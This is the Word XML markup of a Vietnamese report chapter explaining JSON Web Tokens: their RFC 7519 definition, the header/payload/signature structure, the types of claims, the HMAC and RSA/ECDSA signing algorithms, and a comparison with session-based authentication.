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7ed5ae5538c75b0bc496389d117b6feec80ff65"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chương 2: Cơ Sở Lý Thuyết — JSON Web Token (JWT)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="12" w:name="tổng-quan-về-jwt"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 Tổng quan về JWT</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="9" w:name="định-nghĩa"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1.1 Định nghĩa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">JSON Web Token (JWT)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">là một tiêu chuẩn mở được định nghĩa trong</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">RFC 7519</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(tháng 5/2015) bởi IETF. JWT cung cấp một phương thức</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">nhỏ gọn (compact)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tự chứa (self-contained)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">để truyền tải thông tin một cách an toàn giữa các bên dưới dạng một đối tượng JSON. Thông tin này có thể được</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">xác minh và tin cậy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nhờ chữ ký số (digital signature).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">JWT có thể được ký bằng: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Khóa bí mật</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(secret key) — sử dụng thuật toán HMAC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Cặp khóa công khai/bí mật</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(public/private key pair) — sử dụng thuật toán RSA hoặc ECDSA</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="9"/>
    <w:bookmarkStart w:id="10" w:name="bối-cảnh-ra-đời"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1.2 Bối cảnh ra đời</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trong mô hình ứng dụng web truyền thống, server duy trì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(phiên làm việc) cho mỗi người dùng đã đăng nhập. Tuy nhiên, cách tiếp cận này gặp nhiều hạn chế trong thời đại kiến trúc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,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ứng dụng SPA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Single Page Application), và</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ứng dụng di động</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. JWT ra đời để giải quyết các vấn đề này bằng cơ chế xác thực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(không lưu trạng thái phía server).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="10"/>
    <w:bookmarkStart w:id="11" w:name="các-ứng-dụng-chính"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1.3 Các ứng dụng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  <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(Phân quyền)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sau khi user đăng nhập, mỗi request tiếp theo sẽ kèm JWT. Server xác minh token để cho phép truy cập tài nguyên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Exchange</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(Trao đổi thông tin)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">JWT cho phép truyền thông tin đáng tin cậy giữa các bên nhờ chữ ký số đảm bảo tính toàn vẹn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Sign-On (SSO)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Một token có thể được sử dụng trên nhiều hệ thống/dịch vụ khác nhau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cấu-trúc-của-jwt"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 Cấu trúc của JWT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Một JWT bao gồm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3 phần</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, được phân tách bởi dấu chấm (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.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Header.Payload.Signature</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ví dụ một JWT thực tế:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">eyJzdWIiOiJhZG1pbiIsImp0aSI6IjEyMzQ1Njc4OTAiLCJpZCI6IjEiLCJyb2xlIjoiQWRtaW4ifQ.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="13" w:name="header-phần-đầu"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2.1 Header (Phần đầu)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Header chứa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về token, bao gồm 2 trường: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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Thuật toán ký được sử dụng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Loại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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Header được mã hóa bằng</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Base64URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">để tạo thành phần đầu tiên của JWT.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="13"/>
    <w:bookmarkStart w:id="15" w:name="payload-phần-tải-dữ-liệu"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2.2 Payload (Phần tải dữ liệu)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload chứa các</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">claims</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— là các phát biểu (statements) về một thực thể (thường là user) và dữ liệu bổ sung.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Lưu ý quan trọng:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Payload chỉ được</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">mã hóa Base64URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">KHÔNG được mã hóa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(encrypt). Bất kỳ ai cũng có thể giải mã và đọc nội dung payload. Do đó,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đặt thông tin nhạy cảm (mật khẩu, số thẻ tín dụng…) vào payload.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="14" w:name="các-loại-claims"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Các loại Claims</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">a) Registered Claims (Claims đã đăng ký)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Các claims được định nghĩa sẵn trong RFC 7519, không bắt buộc nhưng được khuyến khích sử dụng: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722"/>
        <w:gridCol w:w="1732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Tên đầy đủ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Bên phát hành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"CaPheMinhHuu_Server"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Chủ thể của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"admin"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Đối tượng nhận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"CaPheMinhHuu_Client"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Expiration Time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Thời điểm hết hạn (Unix timestamp)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1709712000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nbf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Not Before</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Token không hợp lệ trước thời điểm này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1709625600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Issued At</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Thời điểm phát hành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1709625600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JWT ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Định danh duy nhất của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"550e8400-e29b..."</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">b) Public Claims (Claims công khai)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Claims tùy chỉnh được đăng ký trong</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">IANA JWT Claims Registry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">để tránh xung đột tên giữa các hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">c) Private Claims (Claims riêng tư)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Claims tùy chỉnh do hai bên giao tiếp tự thỏa thuận, không được đăng ký.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ví dụ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1709712000</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="14"/>
    <w:bookmarkEnd w:id="15"/>
    <w:bookmarkStart w:id="18" w:name="signature-chữ-ký"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2.3 Signature (Chữ ký)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Signature đảm bảo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">tính toàn vẹn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(integrity) và</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">tính xác thực</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(authenticity) của token — tức là token không bị giả mạo hoặc chỉnh sửa.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="16" w:name="quy-trình-tạo-signature"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quy trình tạo Signature</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Signature = HMAC-SHA256(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    base64UrlEncode(Header) + "." + base64UrlEncode(Payload),</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    secret_key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Bước cụ thể:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. Mã hóa Header bằng Base64URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. Mã hóa Payload bằng Base64URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. Nối 2 chuỗi trên bằng dấu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4. Áp dụng thuật toán ký (ví dụ HMAC-SHA256) với secret key</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">5. Mã hóa kết quả bằng Base64URL → tạo thành phần thứ 3</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="16"/>
    <w:bookmarkStart w:id="17" w:name="quy-trình-xác-minh"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quy trình xác minh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Khi server nhận được JWT:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. Tách 3 phần: Header, Payload, Signature</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. Tạo lại Signature từ Header + Payload + secret key</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. So sánh Signature vừa tạo với Signature trong token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. Nếu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">khớp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ token hợp lệ, chưa bị sửa đổi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">5. Nếu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">không khớp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ token bị giả mạo → từ chối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2" w:name="các-thuật-toán-ký-jwt"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.3 Các thuật toán ký JWT</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="20" w:name="thuật-toán-đối-xứng-symmetric"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.3.1 Thuật toán đối xứng (Symmetric)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191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HMAC sử dụng SHA-256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cả hai bên dùng chung 1 secret key. Nhanh, phù hợp hệ thống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HS384</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">HMAC sử dụng SHA-384</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Bảo mật cao hơn HS256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HS512</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">HMAC sử dụng SHA-512</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Bảo mật cao nhất trong nhóm HMAC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ưu điểm:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Tốc độ nhanh, đơn giản triển khai.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Nhược điểm:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Cả server ký và server xác minh phải biết cùng một secret key → rủi ro lộ key.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="21" w:name="thuật-toán-bất-đối-xứng-asymmetric"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.3.2 Thuật toán bất đối xứng (Asymmetric)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191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RS256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">RSA + SHA-256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ký bằng private key, xác minh bằng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RS384</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">RSA + SHA-384</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Phiên bản mạnh hơn của RS256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RS512</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">RSA + SHA-512</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Bảo mật cao nhất nhóm RSA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ES256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ECDSA + P-256 + SHA-256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Kích thước key nhỏ hơn RSA, hiệu suất tốt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ưu điểm:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Server xác minh chỉ cần public key, không biết private key → an toàn hơn cho hệ thống phân tán.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Nhược điểm:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Chậm hơn thuật toán đối xứng.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3d832c5720a4a6caac84169becc31068860a4eb"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.4 So sánh JWT Authentication và Session-based Authentication</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="23" w:name="cơ-chế-hoạt-động"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.4.1 Cơ chế hoạt động</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Session-based Authentication (Stateful):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Client → Login → Server tạo Session (lưu DB/Memory) → Trả Session ID (Cookie)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Client → Request kèm Cookie → Server tra cứu Session trong DB → Phản hồi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">JWT Authentication (Stateless):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Client → Login → Server tạo JWT (ký bằng secret key) → Trả JWT</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Client → Request kèm JWT (Header) → Server xác minh chữ ký → Phản hồi</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="23"/>
